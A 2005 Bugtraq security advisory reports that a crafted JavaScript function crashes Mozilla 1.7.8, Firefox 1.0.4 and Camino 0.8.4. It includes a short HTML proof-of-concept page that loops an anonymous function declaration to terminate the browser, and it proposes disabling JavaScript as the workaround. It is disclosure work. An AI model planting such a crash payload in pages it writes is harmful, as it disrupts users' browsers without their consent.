List:       bugtraq
Subject:    Mozilla Multiple Product JavaScript Issue
From:       Kurczaba Associates Advisories <advisories () kurczaba ! com>
Date:       2005-06-29 19:23:56
Message-ID: 42C2F54C.60904 () kurczaba ! com

Mozilla Multiple Product JavaScript Issue
http://www.kurczaba.com/html/security/0506241.htm
-------------------------------------------------

Vendor:
Mozilla (http://www.mozilla.org)

Vulnerable Software:
Mozilla 1.7.8
Firefox 1.0.4
Camino 0.8.4

Vulnerability/Exploit:
By using a specially crafted JavaScript function, it is possible to
crash the above-named browsers. The script can be executed both with and
without user intervention.

Proof of Concept:
-----START of PoC-----
<html>
<head>
</head>
<body>
<script language="JavaScript">
	//Run the function 20000 times
		for (a = 0; a <= 20000; a++)
		{
			//Here is the special code that terminates the browser
			function(){};
		}
	//Displays an alert to notify the user if the browser is not vulnerable.
		alert("Good news - Your browser is not vulnerable.");
</script>
</body>
</html>
-----END of PoC-----


Proof of Concept (Online):
Manual: http://www.kurczaba.com/html/security/0506241_poc.htm
Automatic: http://www.kurczaba.com/html/security/0506241_poc2.htm

Workaround:
Disable JavaScript

Date Discovered:
June 14, 2005

Severity:
Low

Credit:
Paul Kurczaba
